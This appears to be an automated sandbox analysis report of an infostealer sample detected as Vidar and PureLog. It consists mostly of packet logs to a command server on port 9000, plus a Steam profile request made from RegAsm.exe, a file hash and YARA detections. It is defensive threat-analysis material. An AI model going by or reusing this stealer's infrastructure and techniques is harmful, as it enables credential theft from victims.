                                                                                                                                                                                              May 7, 2024 05:29:02.597415924 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.597419024 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.597429037 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.597440958 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.597443104 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.597460032 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.597479105 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.597480059 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.597526073 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.598275900 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.598298073 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.598329067 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.598372936 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.598372936 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.598372936 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.598386049 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.598400116 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.598427057 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.598436117 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.598448992 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.598500013 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.599338055 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.610097885 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.610110998 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.610116005 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.610135078 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.610167027 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.610938072 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.610954046 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.610964060 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.610975027 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.610985041 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.610990047 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.611002922 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.611004114 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.611027002 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.611049891 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.611900091 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.611912012 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.611944914 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.611967087 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.612143993 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.612155914 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.612168074 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.612189054 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.612200022 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.612210989 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.612227917 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.612237930 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.612251043 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.612251997 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.612277985 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.612296104 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.612972021 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613002062 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613013983 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613018036 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613027096 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613054037 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613063097 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613074064 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613097906 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613141060 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613142014 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613250017 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613836050 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613850117 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613876104 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613877058 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613889933 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613898993 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613914967 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613917112 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613923073 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613940001 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.613950014 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.613975048 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.614784956 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.614798069 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.614809036 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.614821911 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.614830017 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.614840031 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.614840031 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.614852905 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.614861965 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.614883900 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.614886045 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.614922047 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.615807056 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.615844965 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.615858078 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.615869999 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.615891933 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.615901947 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.615911961 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.615952015 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.615952015 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.615989923 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.616009951 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.616044044 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.616569042 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.616581917 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.616605997 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.616605997 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.616616011 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.616628885 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.616652012 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.616672993 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.616703033 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.616743088 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.616744995 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.616780043 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.617485046 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.617508888 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.617521048 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.617523909 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.617551088 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.617551088 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.617572069 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.617583990 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.617594957 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.617643118 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.617643118 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.617643118 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.618537903 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.618551016 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.618580103 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.618587017 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.618599892 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.628468037 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.628478050 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.628500938 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.629206896 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.629223108 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.629236937 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.629245996 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.629256964 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.629277945 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.629287004 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.629312038 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.629323006 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.629348993 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.629353046 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.629390955 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.630124092 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.630137920 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.630162954 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.630182028 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.630191088 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.630194902 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.630223036 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.630228996 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.630234957 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.630256891 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.630273104 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.630295992 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631038904 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631053925 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631078005 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631087065 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631098986 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631112099 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631122112 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631124020 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631146908 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631154060 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631158113 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631194115 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631196022 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631230116 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631817102 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631856918 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631887913 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631900072 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631911039 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631922960 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631925106 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631933928 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631943941 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631947041 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.631951094 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.631978035 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.632802963 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.632814884 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.632824898 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.632843018 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.633019924 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.633049011 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.633049011 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.633151054 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:02.633192062 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.864377022 CEST497379000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:02.864737034 CEST497399000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:03.050584078 CEST90004973965.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:03.050648928 CEST90004973765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:03.050687075 CEST497399000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:03.050714970 CEST497379000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:03.051057100 CEST497399000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:03.241144896 CEST90004973965.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:03.241543055 CEST90004973965.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:03.241600990 CEST497399000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:03.241933107 CEST497399000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:03.243576050 CEST497399000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:03.243690968 CEST497399000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:03.429265022 CEST90004973965.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:03.429550886 CEST90004973965.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:03.919863939 CEST90004973965.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:03.919944048 CEST497399000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:03.983891010 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:03.984304905 CEST497409000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:04.169723988 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:04.169775963 CEST90004974065.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:04.169795990 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:04.169848919 CEST497409000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:04.170162916 CEST497409000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:04.355719090 CEST90004974065.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:04.355958939 CEST90004974065.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:04.356028080 CEST497409000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:04.356307983 CEST497409000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:04.357903004 CEST497409000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:04.357933044 CEST497409000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:04.543540001 CEST90004974065.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:04.543560028 CEST90004974065.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:05.047827005 CEST497399000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:05.048238993 CEST497419000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:05.065356016 CEST90004974065.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:05.065454006 CEST497409000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:05.231955051 CEST90004974165.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:05.232038021 CEST497419000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:05.232371092 CEST497419000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:05.233738899 CEST90004973965.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:05.233800888 CEST497399000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:05.416109085 CEST90004974165.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:05.416348934 CEST90004974165.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:05.416414022 CEST497419000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:05.416775942 CEST497419000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:05.418514013 CEST497419000192.168.2.465.108.152.56
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 7, 2024 05:28:54.095249891 CEST | 55374 | 53 | 192.168.2.4 | 1.1.1.1
May 7, 2024 05:28:54.181236029 CEST | 53 | 55374 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 7, 2024 05:28:54.095249891 CEST | 192.168.2.4 | 1.1.1.1 | 0xa13a | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 7, 2024 05:28:54.181236029 CEST | 1.1.1.1 | 192.168.2.4 | 0xa13a | No error (0) | steamcommunity.com | | 104.105.90.131 | A (IP address) | IN (0x0001) | false
May 7, 2024 05:28:55.456705093 CEST | 1.1.1.1 | 192.168.2.4 | 0x10a7 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
May 7, 2024 05:28:55.456705093 CEST | 1.1.1.1 | 192.168.2.4 | 0x10a7 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                              • steamcommunity.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.105.90.131 | 443 | 5816 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-07 03:28:54 UTC | 119 | OUT | GET /profiles/76561199680449169 HTTP/1.1
                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Cache-Control: no-cache
2024-05-07 03:28:54 UTC | 1882 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Date: Tue, 07 May 2024 03:28:54 GMT
                                                                                                                                                                                              Content-Length: 35663
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: sessionid=cbda57a1813e582b31fe89fa; Path=/; Secure; SameSite=None
                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C3c9fb2dce0904d04a144dbc58052f440; Path=/; Secure; HttpOnly; SameSite=None
2024-05-07 03:28:54 UTC | 14502 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-05-07 03:28:54 UTC | 10074 | IN | Data Ascii: <a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a>
2024-05-07 03:28:54 UTC  11087  IN
                                                                                                                                                                                              Data Ascii: &quot;FROM_WEB&quot;:true,&quot;WEBSITE_ID&quot;:&quot;Community&quot;,&quot;BASE_URL_SHARED_CDN&quot;:&quot;https:\/\/shared.cloudflare.steamstatic.com\/&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,&quot;S


                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:05:28:52
                                                                                                                                                                                              Start date:07/05/2024
                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                              Imagebase:0x9a0000
                                                                                                                                                                                              File size:358'000 bytes
                                                                                                                                                                                              MD5 hash:B9773393891D9CC471CD58CAC09052DD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1628578580.00000000009A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                              Start time:05:28:52
                                                                                                                                                                                              Start date:07/05/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                              Imagebase:0x7e0000
